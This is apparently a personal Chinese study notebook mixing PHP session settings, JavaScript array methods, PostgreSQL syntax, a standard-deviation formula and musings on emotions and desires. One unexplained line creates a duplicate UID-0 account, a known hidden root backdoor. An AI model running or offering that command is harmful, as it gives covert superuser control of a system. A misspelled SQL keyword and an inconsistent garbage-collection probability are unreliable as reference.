
************************************************************************************************************

任务正理：PostgreSQL  PHP模式   EA11

postgreSQL参考：http://www.postgresql.org/docs/9.5/interactive/index.html

************************************************************************************************************
www.multimall.cn

卖家（vendor）  商品(wares)   订单(order)   买家（buyer）  



************************************************************************************************************


Love makes all hard hearts gentle.  爱情把一切冷酷的心变得温柔。


七情指一般人所具有之七种感情：喜、怒、哀、惧、爱、恶、恨。
六欲指眼、耳、鼻、舌、身、意六欲。 
七情，指一般人所具有之七种感情：喜、怒、哀、惧、爱、恶、恨。
六欲，据大智度论卷二记载，系指凡夫对异性所具有之六种欲望：
色欲、形貌欲、威仪欲、言语音声欲、细滑欲、人相欲；或指眼、耳、鼻、舌、身、意等六欲。
今所用‘七情六欲’一语，即套用佛典中之‘六欲’，泛指人之情绪、欲望等。
七情六欲是人类基本的生理要求和心理动态，是人性基础的基础。
现代汉语概念里，情与欲还不完全是一回事。
情主要是指人的情感表现，属于人的心理活动范畴；
而欲主要是指人的生存和享受的需要，属于生理活动的范畴。

谦卑不是看轻自己，而是不仅为自己着想。

面向对象的编程到底应当牢记什么？ 保持对象小型化、模块化、非耦合以及流线型.

标准方差：方差的平方根，一组数据中的每一个数与这组数据的平均数的差的平方的和再除以数据的个数，再取平方根。
σ={[∑(Xi-X)^2]/n}^(1/2)
σ标准方差    Xi样本数据，i取1到n    X样本的平均数     n样本个数
标准方差能反映一个数据集的离散程度，数据整体分布离平均值越近，标准方差就越小。

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash vxzhan
select (@i:=@i+1) as i,post_time from tb_check_price,(select @i:=0) as tt  order by post_time desc; 

session.name = PHPSESSID			//默认session名为PHPSESSID
session.use_trans_sid = 0			//默认为0 对每个URL启用session名=SID,不建议开启，存在安全问题
;session.save_path = "/tmp"			//session的保存路径
session.gc_probability = 1			//
session.gc_divisor = 1000			//这两个合起来就是启动GC进行管理概率的 session.gc_probability = 1/session.gc_divisor = 100 等于 百分之一的几率. 

当文件成为垃圾时，要有一百次 启动的机会才会把过期的文件（垃圾回收）。
session.gc_maxlifetime = 1440			// session的发呆时间，默认1440 成为垃圾 （被回收时间） 单位以秒计算

session.cookie_lifetime = 0			//cookie默认的生命周期，默认为0 （当关闭浏览器时在启动SESSION时就会重新生成一个新的SESSION  如果设置时间，不管是否到设定的时间，都会重新生成新的SESSION。）

session.save_handler = files			//设置session的处理方式，可以设置user自定义
session.use_cookies = 1				//sessionid在客户端采用的存储方式，置1代表使用cookie记录客户端的sessionid


//javascript 的sort用法
var v = [0,1,5,10,15];
v.sort(function(v1,v2){
	return v1 > v2 ? -1 : (v1 == v2 ? 0 : 1);
});
console.log(v);
数组的操作方法：
concat
var colors = ['red','green','blue'];
var colors2 = colors.concat('yellow',['black','brown']);   ===> red,green,blue,yellow,black,brown

slice 方法
splice方法

indexOf()和 lastIndexOf()是ECMAScript 5为数组添加的两个方法
every(),filter(),forEach(),map(),some()是ECMAScript 5为数组添加的迭代方法
reduce(），reduceRight()是ECMAScript 5为数组添加的缩小方法


POSTGRESQL位置参数：

CREATE FUNCTION dept(text) RETRURNS dept 
	AS $$ SELECT * FROM dept WHERE name = $1 $$
	LANGUAGE SQL;
在函数被调用的时候这里的$1将引用第一个参数

POSTGRESQL下标：如果一个表达式生成一个数组类型的数值，那么我们可以通过下面这样的表达式来提取数组中的元素 
	expression[subscript]
	expression[lower_subscript:upper_subscript] 多个相邻的元素（‘数组片断’）
	mytable.arraycolumn[4]
	mytable.two_d_column[17][34]
	$1[10:42]
	(arrayfunction(a,b))[42]


POSTGRESQL排序规则表达式，标量子查询，数组构造器，行构造器，。


